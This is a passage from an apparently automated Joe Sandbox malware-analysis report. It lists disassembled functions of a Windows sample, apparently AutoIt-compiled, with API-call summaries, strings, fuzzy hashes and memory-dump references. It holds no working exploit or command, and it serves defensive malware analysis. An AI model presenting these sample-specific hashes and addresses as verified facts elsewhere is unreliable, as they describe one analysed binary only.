                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 2592858361-0
                                                            • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction ID: ed7966b7c0ecffd2e122af38aa0148f7910176caa13bb47d5d21a61569944dbf
                                                            • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction Fuzzy Hash: 6151C1BAA08782C6E724EB15F844379BB64FB49B94F944136DA6D07B94CF3CE405C712
                                                            Function 00007FF7EC151E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2082702847-0
                                                            • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                            • Instruction ID: e403d7e48a63a847f5d78a52ac94599e6768fae660a45ea4a9acbc3d006cc090
                                                            • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                            • Instruction Fuzzy Hash: 5C2184A9A0974281EE16BB69F404379E292AF44775FA40737EB3D067D5DF3CE404C622
                                                            Function 00007FF7EC192240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                            • Instruction ID: fb685f7bac34d89767ee3d2bb501edde8066e2cb880da2e5eb642b14643873d5
                                                            • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                            • Instruction Fuzzy Hash: 7E11C6B9B1471182EB08DF65F904229BAA5FB48FC2F90803ACE1E47B98CE3DD801C701
                                                            Function 00007FF7EC1D09FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction ID: 76482c8f1ad09bc5b4be2c955162afa7d833f00eab7a22a42040a46f3f0970e9
                                                            • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction Fuzzy Hash: 2311E0B9B1428382E714AB16B804B69FF60EF86B96F884132CF1607B54CF7DE449CB50
                                                            Function 00007FF7EC142D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction ID: d9544e33c7e4fbab94200b698cad1dc2895a8727673f8986d46976d33901eb93
                                                            • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction Fuzzy Hash: 021112B2905A408AD748DF39DC483597FB2FB58B0AB949035C2498F265EF39D49AC721
                                                            Function 00007FF7EC19DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction ID: 228d173bccee22b0d485eb3354cd08f376bff1a55b67cb8f6a2f203ebdd09546
                                                            • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction Fuzzy Hash: 390184B6A1474183EB10EF11F804B69B761FF89B96F845035C90A06B18DF3CD048CB11
                                                            Function 00007FF7EC1B7E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1653399731-2785691316
                                                            • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction ID: f0465897aa01b390a3b8785baf8275dfe6dd44dd887d7d488de1afe4debad785
                                                            • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction Fuzzy Hash: 69B17EBAA08B41CAE710EF65E4802ADBBB0FB84798F900136EE4D57B58DF38D545CB51
                                                            Function 00007FF7EC1BCDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7EC1BBF47), ref: 00007FF7EC1BCE29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 2358735015-567219261
                                                            • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction ID: 20f1661658c83c45ec7b90bce3e87cff81527be7285ab26b33dc9b7166a7e301
                                                            • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction Fuzzy Hash: 569107AAB19653C1EA64BF25E4507B9A7A0BF14780BD04133EE1D93784DF3DE852C722
                                                            Function 00007FF7EC1B6920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction ID: fcd290dcb9ee3a8155d2903e4967972437e9712713add026150659e05b731ea5
                                                            • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction Fuzzy Hash: 7C919AAAB08B42C5EB14EF65E4402ACB3B5FB48B88B854433DE4E47795DF38E405C361
                                                            Function 00007FF7EC190EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00007FF7EC190EDB
                                                              • Part of subcall function 00007FF7EC190B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7EC190F61), ref: 00007FF7EC190C6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharForegroundUpperWindow
                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                            • API String ID: 3570115564-1994484594
                                                            • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction ID: e1a5681918709c5e98a4c288b256486fdc6a65e540a787e102a7b1600edd7081
                                                            • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction Fuzzy Hash: E571D79AF0864381FA64BB29F4103B9E2A2AF54784FD44073DA0E46394EF7DE585D322
                                                            Function 00007FF7EC159B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: #$E$O
                                                            • API String ID: 3215553584-248080428
                                                            • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction ID: 63dab06df2346cc182097fcafa58ac4b9798e76dbf12990e3147bba7b49f393b
                                                            • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction Fuzzy Hash: 144192AAA1975184EF51AF69A8407BDA3B4BF54B88F484032EF4D07758DF3CD442C322
                                                            Function 00007FF7EC19B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                            • String ID: \*.*
                                                            • API String ID: 3196045410-1173974218
                                                            • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction ID: e371b833a9a99f2f6065c5be03b1644e0e470a14a1bf495084b65af374d7305b
                                                            • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction Fuzzy Hash: 444189A6A0865395EB30EF24E8402FDA761FF54784FD00077DA4D57A99EF38E506C721
                                                            Function 00007FF7EC18DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 787153527-1403004172
                                                            • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                            • Instruction ID: c0b7a7dfd414d2c90318dc9bd576c8a9a43fd3b09b621f957bfe9b4964c970bd
                                                            • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                            • Instruction Fuzzy Hash: E331B1AAB0C74282EA24FB11F4512A9E761FF85B80FD44533DA5D47795CE3CE506C722
                                                            Function 00007FF7EC1689B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                            • Instruction ID: c163c4a6a535a4b85ae61b3dfc96eca84b1c56332b121a6e2b977b26de4ce22c
                                                            • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                            • Instruction Fuzzy Hash: 47A1B3EAB0978286FB60AF61A4103B9F691AF407A4F984637DE5D067C5DF7CE444C322
                                                            Function 00007FF7EC1B45A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 2227131780-0
                                                            • Opcode ID: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                            • Instruction ID: b2c2baba94e296093016b96e2f841c9f1d070c9d586b7edd9b214b2fa0ceea0a
                                                            • Opcode Fuzzy Hash: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
                                                            • Instruction Fuzzy Hash: C8A193AAA08682C2DB24FB26E4503BDE791FF85B94F808532DE4E47795DE3CD501CB21
                                                            Function 00007FF7EC1BE838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                            • Instruction ID: 335565d6e6d160c026520bec5b7ce2ad8658238bb1d00d1cd4e1d75a776ca490
                                                            • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                            • Instruction Fuzzy Hash: 6D81BEAAB08691C5EB14EF26E4547ACA7A4BB49FD4F858032DE0E17B96CF3CD401C751
                                                            Function 00007FF7EC15ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                            • Instruction ID: a81bdf8fbd23d3fdce6598b0908c2b7cd825ab7c6fc2df3fdfd41b598ca2c739
                                                            • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                            • Instruction Fuzzy Hash: BD81AFAAF2C61285F720BB69A4407BDA6A5BF44B48F804137DE0E177D5CF3CA446C722
                                                            Function 00007FF7EC1C02DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 3451389628-0
                                                            • Opcode ID: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
                                                            • Instruction ID: ff591448aead230537e64ebdc00a4d410cbb8716d96bd97e8bf84f95039fdfe0
